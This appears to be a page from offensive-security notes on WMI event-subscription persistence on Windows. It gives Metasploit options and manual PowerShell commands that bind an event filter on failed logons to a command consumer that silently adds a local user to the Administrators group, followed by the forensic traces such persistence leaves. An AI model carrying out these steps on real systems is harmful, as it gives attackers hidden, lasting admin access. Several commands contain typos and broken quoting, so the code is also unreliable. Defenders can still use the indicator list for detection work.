WMI Persist With Event Filters

Automation

There are many great automated ways to do this.
https://github.com/Sw4mpf0x/PowerLurk
Metasploit post module exploit/windows/local/wmi_persistence

Basic options:
  Name                Current Setting  Required  Description
  ----                ---------------  --------  -----------
  CALLBACK_INTERVAL   1800000          yes       Time between callbacks (In milliseconds). (Default: 1800000).
  CLASSNAME           UPDATER          yes       WMI event class name. (Default: UPDATER)
  EVENT_ID_TRIGGER    4625             yes       Event ID to trigger the payload. (Default: 4625)
  PERSISTENCE_METHOD  EVENT            yes       Method to trigger the payload. (Accepted: EVENT, INTERVAL, LOGON, PROCESS, WAITFOR)
  PROCESS_TRIGGER     CALC.EXE         yes       The process name to trigger the payload. (Default: CALC.EXE)
  SESSION                              yes       The session to run this module on.
  USERNAME_TRIGGER    BOB              yes       The username to trigger the payload. (Default: BOB)
  WAITFOR_TRIGGER     CALL             yes       The word to trigger the payload. (Default: CALL)

Manual Mode

Check if WMI is enabled, if it is not any WMI command that you execute will attempt to download WMI
This download process does log in the WMI Log
Check if WMI is enabled on the remote system

reg query "HKLM\System\CurrentControlSet\Services\Winmgt"
Start        REG_DWORD        0x2

0x2 --> Auto Start
0x3 --> Demand Start
0x4 --> Disabled

#OR
get-service Winmgmt

Check for existing entries

Check for existing event filter consumer bindings that are on the system

Get-Wmiobject -Class __FilterToConsumerBinding -NameSpace "root\Subscription"

Ensure the system is logging event logs for the type of event you want to use

- i.e. logon, logoff event

auditpol /get /category:*
#OR for logon logoff 
auditpol /get /category:Logon/Logoff

--output--
System audit policy
Category/Subcategory                      Setting
Logon/Logoff
  Logon                                   Success and Failure
  Logoff                                  Success
  Account Lockout                         Success
  IPsec Main Mode                         No Auditing
  IPsec Quick Mode                        No Auditing
  IPsec Extended Mode                     No Auditing
  Special Logon                           Success
  Other Logon/Logoff Events               No Auditing
  Network Policy Server                   Success and Failure
  User / Device Claims                    No Auditing
  Group Membership                        No Auditing

Create your own filter and consumer

$x='SCM System Log Filter'
$z='SCM System Log Consumer'

Now create the triggering event

$q='Select * from __InstanceCreationEvent WITHIN 10 where TargetInstance isa 'Win32-NtLogEvent' and TargetInstance.logfile='Security' and (TargetInstance.EventCode='4625')"

Now create your event filter

$wmifilter=Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$x;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$q} ErrorAction Stop

Create the event consumer

$wmiconsumer=Set-WmiInstance -Class CommandLineEventConsumer -NameSpace "root\subscription" -Arguments @{Name=$z;CommandLineTemplate='C:\\Windows\\System32\\windowspowershell\\v.1.0\\powershell.exe -v 2.0 -nop -c "if(wevtutil qe security /rd:true /f:text /c:1 `"*[System/EventID=4625]`" | findstr /i "fake username here"){net localgroup Administrators <localuser> /add}"'}

Combine the filter and the comsumer

Set-WmiInstance -Class __FilterToConsumerBinding -NameSpace "root\subscription" -Arguments @{Filter=$wmifilter;Consumer=$wmiconsumer}

Ensure Its all working and correct

Get-WmiObject -Class __FilterToConsumerBinding -NameSpace "root\subscription"

IOCs Left Behind

C:\Windows\System32\Wbem\Repository\INDEX.BTR
- Cotnains the names of event filter and event consumer 
C:\Windows\System32\Wbem\Repository\OBJECTS.DATA
- Contains the names of event filter and event comsumer 
- Contains the command in the event consumer 
C:\Windows\System32\Wbem\Repository\MAPPING2.MAP
- Prefetch Files
"HKLM\Software\Microsoft\Wbem\Ess\//./root\CIMV2\MS_NT_EVENT_LOG_EVENT_PROVIDER"

Other Logs

5857 Active ScriptEventConsumer provider started with result code 0x0

PreviousGuest Windows Account Persistence NextSAM SYSTEM Exfil / Pass The Hash

Last updated 2 years ago

Automation

Manual Mode

Check for existing entries

Ensure the system is logging event logs for the type of event you want to use

- i.e. logon, logoff event

Create your own filter and consumer

Now create the triggering event

Now create your event filter

Create the event consumer

Combine the filter and the comsumer

Ensure Its all working and correct

IOCs Left Behind

Other Logs